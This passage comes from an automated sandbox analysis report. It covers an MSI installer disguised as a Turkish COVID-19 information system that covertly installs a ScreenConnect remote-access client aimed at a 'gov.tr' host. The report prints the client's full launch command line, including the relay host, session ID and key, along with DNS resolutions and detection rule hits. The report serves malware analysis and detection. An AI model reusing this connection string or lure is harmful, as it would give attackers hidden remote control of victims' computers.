                                                                                                                                              Feb 19, 2021 12:31:05.014539003 CET53495638.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:05.804095030 CET5135253192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:05.855832100 CET53513528.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:06.736252069 CET5934953192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:06.793525934 CET53593498.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:08.224325895 CET5708453192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:08.281716108 CET53570848.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:10.856376886 CET5882353192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:10.907171011 CET53588238.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:11.651300907 CET5756853192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:11.700108051 CET53575688.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:16.513422966 CET5054053192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:16.562335014 CET53505408.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:27.689553022 CET5436653192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:27.748895884 CET53543668.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:41.925888062 CET5303453192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:41.985476017 CET53530348.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:52.192395926 CET5776253192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:52.243958950 CET53577628.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:55.250382900 CET5543553192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:55.309564114 CET53554358.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:32:26.609262943 CET5071353192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:32:26.663455009 CET53507138.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:32:34.218203068 CET5613253192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:32:34.288237095 CET53561328.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:32:35.833323002 CET5898753192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:32:35.897211075 CET53589878.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:33:05.418225050 CET5657953192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:33:05.469968081 CET53565798.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:33:05.787070990 CET6063353192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:33:05.839560032 CET53606338.8.8.8192.168.2.3

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                              Feb 19, 2021 12:30:59.070993900 CET192.168.2.38.8.8.80xf291Standard query (0)instance-s6p2r4-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                                                                                              Feb 19, 2021 12:30:59.191792011 CET192.168.2.38.8.8.80xd9ddStandard query (0)instance-s6p2r4-relay.screenconnect.comA (IP address)IN (0x0001)

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                              Feb 19, 2021 12:30:59.132529020 CET8.8.8.8192.168.2.30xf291No error (0)instance-s6p2r4-relay.screenconnect.comserver-ovh31150295-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                              Feb 19, 2021 12:30:59.132529020 CET8.8.8.8192.168.2.30xf291No error (0)server-ovh31150295-relay.screenconnect.com51.77.118.172A (IP address)IN (0x0001)
                                                                                                                                              Feb 19, 2021 12:30:59.249202967 CET8.8.8.8192.168.2.30xd9ddNo error (0)instance-s6p2r4-relay.screenconnect.comserver-ovh31150295-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                              Feb 19, 2021 12:30:59.249202967 CET8.8.8.8192.168.2.30xd9ddNo error (0)server-ovh31150295-relay.screenconnect.com51.77.118.172A (IP address)IN (0x0001)

                                                                                                                                              Code Manipulations

                                                                                                                                              Statistics

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Start time:12:30:53
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Covid 19 bilgi y#U00f6netim sistemi.msi'
                                                                                                                                              Imagebase:0x7ff643960000
                                                                                                                                              File size:66048 bytes
                                                                                                                                              MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000003.203704441.00000269DBA8D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000003.203551548.00000269DBA5B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:30:54
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 310E53CA954B87DDF133BB769ED24F52 C
                                                                                                                                              Imagebase:0x930000
                                                                                                                                              File size:59904 bytes
                                                                                                                                              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:30:54
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                              Imagebase:0x1360000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:30:56
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 4286051B5CAEA5BC438DE69C35768ED1
                                                                                                                                              Imagebase:0x930000
                                                                                                                                              File size:59904 bytes
                                                                                                                                              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:30:57
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6600E2C3A2980F238FD9D94A5368BBD9 E Global\MSI0000
                                                                                                                                              Imagebase:0x930000
                                                                                                                                              File size:59904 bytes
                                                                                                                                              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:30:57
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-s6p2r4-relay.screenconnect.com&p=443&s=b49f7b4e-1f8e-4869-a774-7ac73425b6f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAlGYhEPkxKLjcbpwfNZ%2bHR%2fKlTyh8C1eZxhmDq%2baJwQu0VExdNkYfU8P8vD7Y1ZlciHJizNXwnloBDvG1WWJc%2fIrWfX92vykYxqBgUI%2b4K3nOFaRgz3P4iujIXLKmSFuso0Nz%2f9QKAIGQ2FXaFykfYO2dzQQT3wK3Tf0snCYB0oDbSx4YwykdQiz5RcNZfnRkEpx9V%2fjHA1Ojf4Qy2Jy%2beBkU7baqCnkSPedSlHYXKd5Ntlcetv0j6hyn1m4yl%2fFPTTzSAOHcH9OFurBD8INMgbxBWfXp2iwBLbUhbM%2fwW8uAnf93bOrruAeNwCTfZiqQKKfPT0Gmm24qAeUeFxKjR&t=&c=gazete&c=gov.tr&c=tr&c=pc&c=&c=&c=&c='
                                                                                                                                              Imagebase:0xe30000
                                                                                                                                              File size:90704 bytes
                                                                                                                                              MD5 hash:F4AFEF1043565F8967F5E8F57B3EEE13
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000005.00000002.471825192.0000000004112000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Start time:12:30:59
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User'
                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                              File size:557136 bytes
                                                                                                                                              MD5 hash:72D9361CA129593F1F953D42EBD77122
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000006.00000002.457186960.0000000000CF2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000006.00000000.204518995.0000000000CF2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Start time:12:31:03
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System'
                                                                                                                                              Imagebase:0x5b0000
                                                                                                                                              File size:557136 bytes
                                                                                                                                              MD5 hash:72D9361CA129593F1F953D42EBD77122
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000000.212668661.00000000005B2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000002.457213265.00000000005B2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:low

                                                                                                                                              General

                                                                                                                                              Start time:12:31:24
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:31:35
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:31:36
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:31:36
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:31:36
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:31:37
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:31:37
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                              Imagebase:0x7ff716970000
                                                                                                                                              File size:163336 bytes
                                                                                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:31:38
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:12:32:29
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Start time:12:32:38
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                                              Imagebase:0x7ff6883e0000
                                                                                                                                              File size:455656 bytes
                                                                                                                                              MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Start time:12:32:39
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Start time:12:32:53
                                                                                                                                              Start date:19/02/2021
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Disassembly

                                                                                                                                              Code Analysis

                                                                                                                                              Reset < >